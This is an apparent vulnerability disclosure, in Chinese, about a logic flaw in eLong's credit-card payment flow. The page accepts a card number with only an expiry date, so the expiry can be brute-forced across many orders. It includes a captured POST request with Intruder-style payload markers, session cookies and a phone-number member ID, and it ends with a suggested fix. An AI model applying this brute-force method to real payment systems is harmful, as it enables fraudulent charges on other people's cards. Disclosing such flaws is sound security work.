感谢壮丁的友情赞助,好基友,一起走。
首先,在艺龙随便下了一个订单,到支付页面,选择信用卡支付
输入正确的卡号,有效期
姓名,身份证等相关信息随便输
居然支付成功了。
那么问题来了
说明这里只判断信用卡有效期即可成功支付
接下来就简单了,我们只要尝试爆破出信用卡的有效期即可
然后发现错误的有效期也能使订单到判定支付是否成功的阶段
所以。下多个订单
随便点击一个订单到支付页面
抓包
POST /epay/isajax/CreditCardExtend/Save HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: https://secure.elong.com/epay/cn/creditcardextend/433877263696341615train
Accept: application/json, text/javascript, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: secure.elong.com
Content-Length: 360
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SessionGuid=42ff44d5-95e9-4a84-a57b-0199c4a28a59; com.eLong.CommonService.OrderFromCookieInfo=Pkid=50&Parentid=50000&Coefficient=0.0&Status=1&Priority=8000&Makecomefrom=0&Savecookies=0&Cookiesdays=0&Isusefparam=0&Orderfromtype=1; s_cc=true; s_sq=elongcom%3D%2526pid%253Dmy.elong.com%25252Ftrain%25252Ftrainorder_cn.html%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmy.elong.com%25252Ftrain%25252Ftrainorder_cn.html%25253Frnd%25253D20160323142748598%252523%25253F%2526ot%253DA%2526oi%253D413; CookieGuid=bf5e468c-2c0e-4e32-a174-c6b00a59600b; Esid=72832668-11ae-4cf6-8486-f2a53dda7c15; member=18075958330; Lgid=LRpRtrsC3gsExwGXhEk%2flpaR3waA7McUH7SGryL5%2fSFdUfZTcxrrKJN7gDYF38TJf%2b6813mw0I7%2bEqLpl1r2dNM00g3TNSUIsbfjUZc3xAoySWAQkZq3Hr3%2fuLPImoK3; s_visit=1; route=d99f2606f97cd9d480bdb1efdeca5346; ASP.NET_SessionId=go0f0j550ckcs055bbbdmvu1; TLTCNT=CHG-OWEBTJ10000000000077396
language=cn&id=§433877263696341615train§&paymentInfo.CreditCardNumber=******&paymentInfo.Cardholder=%E6%B5%8B%E8%AF%95&paymentInfo.FirstName=&paymentInfo.MiddleName=&paymentInfo.LastName=&paymentInfo.CardValidity=§2022-1§&paymentInfo.CertificateTypeID=2&paymentInfo.CertificateNumber=321321&paymentInfo.CheckedLast4Num=false&paymentInfo.IdOfCardsHistory=
订单+有效期爆破。隔几秒放过
那么订单都会到判断支付是否成功的阶段,如果订单支付成功,说明有效期是正确的
成功爆破出信用卡有效期并成功支付
解决方案:
信用卡支付逻辑是不是该有有效期+CVV码+手机验证码组成?